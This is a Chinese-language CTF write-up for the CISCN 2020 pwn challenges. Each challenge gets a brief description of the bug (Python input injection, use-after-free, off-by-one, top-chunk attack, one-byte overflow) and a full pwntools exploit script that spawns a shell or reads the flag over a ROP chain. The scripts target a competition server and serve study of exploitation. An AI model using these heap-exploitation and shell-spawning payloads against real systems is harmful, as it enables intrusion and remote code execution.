CISCN2020 PWNwp
国赛嘛,不想说啥
这里写目录
- babyjsc
- maj
- easyboxs
- nofree
- wow
- 总结
babyjsc
非预期,python的input命令执行漏洞
# -*- coding: utf-8 -*
from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
context.arch = 'amd64'
p = 0
def pwn(ip,port,debug):
p = remote(ip,port)
payload='''__import__('os').system('sh')'''
p.sendline(payload)
p.interactive()
if __name__ == '__main__':
pwn('101.200.53.148',13465,0)
maj
UAF,没有打印函数,更改IO_stdout来泄露libc地址,然后改malloc_hook为shell
脚本1/16的成功率。
# -*- coding: utf-8 -*
from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
context.arch = 'amd64'
elf = ELF('pwn')
p = 0
def pwn(ip,port,debug):
global p
if(debug == 1):
p = process('./pwn')
else:
p = remote(ip,port)
def add(size,content):
p.sendlineafter(">> ","1")
p.sendlineafter("please answer the question\n\n","80")
p.sendlineafter("______?\n",str(size))
p.sendlineafter("start_the_game,yes_or_no?\n",content)
def add2(size,content):
p.sendlineafter(">> ","1")
p.sendlineafter("please answer the question\n","80")
p.sendlineafter("______?",str(size))
p.sendlineafter("start_the_game,yes_or_no?",content)
def free2(index):
p.sendlineafter(">> ","2")
p.sendlineafter("index ?",str(index))
def free(index):
p.sendlineafter(">> ","2")
p.sendlineafter("index ?\n",str(index))
def edit(index,content):
p.sendlineafter(">> ","4")
p.sendlineafter("index ?\n",str(index))
p.sendafter("__new_content ?\n",content)
def edit2(index,content):
p.sendlineafter(">> ","4")
p.sendlineafter("index ?",str(index))
p.sendafter("__new_content ?",content)
add(0x60,p64(0) + p64(0x71))
add(0x60,p64(0) + p64(0x51))
add(0x60,p64(0)*3 + p64(0x51))
edit(0,p64(0) + p64(0x71))
edit(1,p64(0) + p64(0x51))
edit(2,p64(0)*3 + p64(0x51))
free(0)
free(1)
edit(1,'\x10')
add(0x60,'a')
# delete(1)
add(0x60,p64(0)*0xb + p64(0x71))
edit(4,p64(0)*0xb + p64(0x71))
free(1)
edit(4,p64(0)*0xb + p64(0x91))
free(1)
edit(4,p64(0)*0xb + p64(0x71))#0x25dd
edit(1,'\xdd\x25')
add(0x60,'a')#5
add(0x60,'A'*0x33 + p64(0xfbad1800) + p64(0)*3 + '\x00')#6
edit(6,'A'*0x33 + p64(0xfbad1800) + p64(0)*3 + '\x00')
one = [0x45226,0x4527a,0xf0364,0xf1207]
p.recv(0x40)
libcbase_addr=u64(p.recv(6).ljust(8,"\x00"))-0x3c5600
print "baseaddr=",hex(libcbase_addr)
pause()
one_gagedt=libcbase_addr+one[3]
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
malloc_hook=libcbase_addr+libc.symbols["__malloc_hook"]
fuck_chunk = malloc_hook - 0x23
add2(0x60,'a')#7
free2(7)
edit2(7,p64(fuck_chunk))
add2(0x60,'a')#8
add2(0x60,'b'*0x13 + p64(one_gagedt))#9
edit2(9,'b'*0x13 + p64(one_gagedt))
p.sendlineafter(">> ","1")
p.sendlineafter("please answer the question\n","80")
p.sendlineafter("______?","60")
#gdb.attach(p)
p.interactive()
if __name__ == '__main__':
pwn('101.200.53.148',15423,0)
easyboxs
off-by-one,同样是没有打印函数,真有意思,感觉除了洞不一样,跟maj基本没啥区别
# -*- coding: utf-8 -*
from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
context.arch = 'amd64'
elf = ELF('pwn')
p = 0
def pwn(ip,port,debug):
global p
if(debug == 1):
p = process('./pwn')
else:
p = remote(ip,port)
def add(index,size,content):
p.sendlineafter(">>>\n",'1')
p.sendlineafter("idx:\n",str(index))
p.sendlineafter("len:\n",str(size))
p.sendafter("content:\n",content)
def add2(index,size,content):
p.sendlineafter(">>>",'1')
p.sendlineafter("idx:",str(index))
p.sendlineafter("len:",str(size))
p.sendafter("content:",content)
def free(index):
p.sendlineafter(">>>\n",'2')
p.sendlineafter("idx:\n",str(index))
def free2(index):
p.sendlineafter(">>>",'2')
p.sendlineafter("idx:",str(index))
add(0,0x18,"A"*0x18)
add(1,0xf8,"A")
add(2,0x68,"B")
add(3,0x68,"C")
add(4,0x18,"D")
free(0)
add(0,0x18,"A"*0x18+"\xe1")
free(1)
free(2)
add(0,0xd8,"A")
add(5,0x18,"A")
add(0,0x28,'\xdd\x25')
free(5)
add(5,0x18,"A"*0x18+"\x71")
add(0,0x68,'a')
add(0,0x68,'A'*0x33 + p64(0xfbad1800) + p64(0)*3 + '\x00')
one= [0x45226,0x4527a,0xf0364,0xf1207]
p.recv(0x40)
libcbase_addr=u64(p.recv(6).ljust(8,"\x00"))-0x3c5600
print "baseaddr=",hex(libcbase_addr)
pause()
one_gagedt=libcbase_addr+one[3]
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
malloc_hook=libcbase_addr+libc.symbols["__malloc_hook"]
fuck_chunk = malloc_hook - 0x23
free2(3)
add2(0,0xa1,p64(0)*7+p64(0x71)+p64(fuck_chunk))
add2(0,0x68,'a')
add2(0,0x68,'b'*0x13 + p64(one_gagedt))
p.sendlineafter(">>>",'1')
p.sendlineafter("idx:",'1')
p.sendlineafter("len:",'20')
#gdb.attach(p)
p.interactive()
if __name__ == '__main__':
pwn('101.200.53.148',34521,0)
nofree
这个是我们whali3n51师傅做的,topchunk攻击,然后更改got表制造printf漏洞
# -*- coding: utf-8 -*
from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
context.arch = 'amd64'
elf = ELF('pwn')
p = 0
def pwn(ip,port,debug):
global p
if(debug == 1):
p = process('./pwn')
else:
p = remote(ip,port)
def add(idx,size,content):
p.sendlineafter("choice>> ","1")
p.sendlineafter("idx: ",str(idx))
p.sendlineafter("size: ",str(size))
p.sendafter("content: ",content)
def edit(idx,content):
p.sendlineafter("choice>> ","2")
p.sendlineafter("idx: ",str(idx))
p.sendafter("content: ",content)
for i in range(0x18):
add(0,0x90,'x'*0x90)
add(0,0x90,'\x00')
edit(0,"x"*0x18+p64(0xe1))
add(1,0x90,'x'*0x30)
add(0,0x90,'x'*0x90)
edit(1,"x"*0x38+p64(0x81)+p64(0x602140))
add(0,0x90,'x'*0x77)
add(2,0x90,'x'*0x77+'\x00'*17+p64(0x81))
edit(2,"x"*0x70+p64(0x602068))
edit(0,p64(0x400700))
add(0,0x10,"%17$p")
p.recvuntil("0x")
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
libcbase_addr=int(p.recv(12),16)-0x20840
edit(2,"x"*0x70+p64(0x602068))
system_addr=libcbase_addr+libc.symbols['system']
print "system_addr=",hex(system_addr)
edit(0,p64(system_addr))
add(0,0x10,"sh")
#gdb.attach(p)
p.interactive()
if __name__ == '__main__':
pwn('101.200.53.148',12301,0)
wow
单字节溢出,通过修改部分指针从而控制返回地址,放入ORW的ROP,读出flag
# -*- coding: utf-8 -*
from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
context.arch = 'amd64'
elf = ELF('wow')
p = 0
def pwn(ip,port,debug):
global p
if(debug == 1):
p = process('./wow')
else:
p = remote(ip,port)
poprax=0x41ea0a
poprsi=0x407578
poprdx=0x40437f
poprdi=0x4047ba
poprsp=0x405831
syscall_ret=0x4dc054
addr_p='@'
addr_d='#'
value_p='^'
value_d='|'
write='&'
read='$'
loop1='{'
loop2='}'
p.recvuntil("our code:\n")
p.sendline(value_p+loop1+addr_p+value_p+loop2+read)
p.recvuntil("running....")
p.send("\xd0")
p.recvuntil("code: ")
stack_addr=u64(p.recv(6).ljust(8,"\x00"))
print "stack_addr=",hex(stack_addr)
p.sendafter("continue?\n",'y')
p.sendlineafter('enter your code:\n',value_p+loop1+addr_p+value_p+loop2+read)
p.recvuntil("running....")
p.send("\xf8")
p.sendafter("continue?\n",'y')
ret_addr=stack_addr-0x598
p.sendlineafter('enter your code:\n',value_p+loop1+read+addr_p+value_p+loop2+read+'c'+p64(0)+p64(poprsp)+p64(ret_addr))
ROP=''
ROP+=p64(poprdi)+p64(stack_addr-0x4d0)+p64(poprsi)+p64(72)+p64(poprax)+p64(2)+p64(syscall_ret)
ROP+=p64(poprdi)+p64(3)+p64(poprsi)+p64(stack_addr-0x49e)+p64(poprdx)+p64(0x30)+p64(poprax)+p64(0)+p64(syscall_ret)
ROP+=p64(poprdi)+p64(1)+p64(poprsi)+p64(stack_addr-0x49e)+p64(poprdx)+p64(0x30)+p64(poprax)+p64(1)+p64(syscall_ret)
ROP+="flag\x00"
pause()
p.send(ROP)
p.send('\xb0'*820)
p.sendafter("continue?\n",'n')
p.interactive()
if __name__ == '__main__':
pwn('101.200.53.148',15324,0)
总结
pwn感觉有点套娃,尤其是maj与easyboxs差不多一样。个人觉得没啥新的知识点或者创意。